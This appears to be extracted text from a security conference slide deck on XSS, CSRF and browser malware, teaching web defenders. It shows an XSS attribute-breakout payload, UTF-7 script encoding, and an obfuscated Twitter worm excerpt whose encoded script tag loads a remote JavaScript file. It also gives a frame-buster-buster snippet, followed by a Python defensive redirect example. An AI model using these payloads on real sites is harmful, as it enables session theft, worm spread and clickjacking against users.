8/2/2019 When HTML Goes Bad
When HTML Goes Bad: Inside XSS, CSRF, and Malware...
Mike Shema, Security Research Engineer, Qualys Inc.
When HTML Goes Bad
XSS (HTML injection)
CSRF (HTTP actuation)
Malware (game over...)
Money
Attacks refocus from the web server to the web browser via the web application
Compromise the web application in order to use it as a delivery mechanism
Infect rather than deface
Automated SQL injection attacks infected tens of thousands of web sites
Us and Them
...exploit the system to gain admin access
Requires shell code
...exploit the browser
No shell code required
Access financial information
Install keylogger, network sniffer, botnet
Search for documents, credentials,
Access e-mail
Access social network
Poles Apart
Desktop
Access controls
Process separation
Anti-virus
Browser
Same Origin Policy
Blocks pop-ups
cookies
Tabs!
Database (HTML5)
Safe Links?
http://bit.ly/2z3MBj
http://bit.ly/z18Rv
http://bit.ly/OApJX
http://bit.ly/lSxst
http://bit.ly/wszWO
http://bit.ly/A6Ca
http://tinyurl.com/6q2ab9
Infection
Behind the Scenes
http://website/page.cgi?user=Machine
Welcome to the Machine...
http://website/page.cgi?user=...
Welcome to the ......
Behind the Scenes
http://website/page.cgi?redirect=http://website/otherpage.html
Welcome to the Machine link...
http://website/page.cgi?redirect=+onclick=alert(echoes);a=
Welcome to the Machine link...
So You Think You Can Tell...
+ADw-script+AD4-
orem psem .source
Careful With That AJAX, Eugene
var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect","toUpperCase", "GET", "?", "open", "", "Method", "POST ", " HTTP/1.1","setRequestHeader", "Content-Type", "application/x-www-form-urlencoded",
"onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28",")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace","innerHTML", "documentElement", "exec", "Twitter should really fix this...Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this,regards Mikeyy", "random", "length", "floor", "mikeyy:)"
...
%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));
XSS
Character encoding
Valid, but unexpected
Invalid, but rendered
Payload encoding
JavaScript obfuscation
Browser-specific quirk
Unusual Suspects
Flash
Images
Browser quirks
Where Are the Worms?
MySpace (old, so very, very old)
Twitter
No large web app worm has been truly weaponized
CSRF
Taking advantage of the design of HTML & HTTP
Forcing state onto a non-stateful transport
Forced workflows
Frame Busting
  if (top != self) { top.location.replace(self.location.href); }

Frame buster buster (the snippet from the codinghorror post cited below; the framing page counts the onbeforeunload events the frame buster triggers and repeatedly points the top window at a URL that answers 204 No Content, which makes the browser cancel the pending navigation):
  var prevent_bust = 0;
  window.onbeforeunload = function() { prevent_bust++ };
  setInterval(function() {
    if (prevent_bust > 0) {
      prevent_bust -= 2;
      window.top.location = 'http://server-which-responds-with-204.com';
    }
  }, 1);

http://www.codinghorror.com/blog/archives/001277.html
http://stackoverflow.com/questions/958997/frame-buster-buster-buster-code-needed
Bricks in the Wall
Coding practices
Frameworks
Libraries
Rectify vs. reject
Inoculation
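The redirect parameter on the Behind the Scenes slides is echoed into an href attribute, which is why a stray quote in it becomes an onclick handler. As an added example (not code from the deck or from Qualys), here is a constructed Python stand-in for page.cgi that applies both halves of "Rectify vs. reject": a reject-style allow-list for the redirect target, assuming the site host "website" taken from the slide URLs, and rectify-style attribute encoding of whatever is rendered.

```python
import html
from urllib.parse import urlsplit

# Constructed stand-in for the deck's page.cgi; the host name comes from the
# slide URLs (http://website/...) and is an assumption, not a real site.
SITE_HOST = "website"

# Constructed sample inputs: the slide's own redirect target and a value in
# the shape of the slide's attribute-breakout payload.
GOOD_TARGET = "http://website/otherpage.html"
PAYLOAD = '" onclick=alert(echoes);a='


def is_allowed_redirect(target: str) -> bool:
    """Reject: accept only same-site targets, drop everything else."""
    parts = urlsplit(target)
    if parts.scheme in ("http", "https"):
        return parts.netloc == SITE_HOST          # absolute URL must be ours
    if parts.scheme or parts.netloc:
        return False                              # javascript:, data:, //host
    path = parts.path
    if not path.startswith("/"):
        return False                              # quotes, spaces, relative junk
    if path[1:2] in ("/", "\\"):
        return False                              # browsers read /\host as //host
    return all(c.isprintable() and not c.isspace() for c in target)


def render_link(redirect: str) -> str:
    """Rectify: HTML-encode before the value is placed in an attribute."""
    safe = html.escape(redirect, quote=True)      # turns " into &quot;
    return '<a href="%s">Welcome to the Machine link...</a>' % safe


def page(redirect: str) -> str:
    """Both together: unexpected targets fall back to a known-safe path."""
    if not is_allowed_redirect(redirect):
        redirect = "/"
    return render_link(redirect)


if __name__ == "__main__":
    print(page(GOOD_TARGET))
    print(page(PAYLOAD))   # quote is encoded, onclick never becomes an attribute
```

Encoding alone already keeps the payload inside the quoted attribute; the allow-list additionally stops the page from being used as an open redirect to off-site or javascript: targets.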
Another Brick in the Wall
User base: xssed, ha.ckers.org
Web application scanners
Source code scanners
Browser Evolution
Move more countermeasures into the browser
Process isolation
Anti-XSS
Anti-CSRF
Behavioral anti-virus
A New Machine
HTML5
Cross-document messaging, a.k.a. Some Other Origins, Too
Database
Expanding the attack surface
Increasing the information store
Thank You!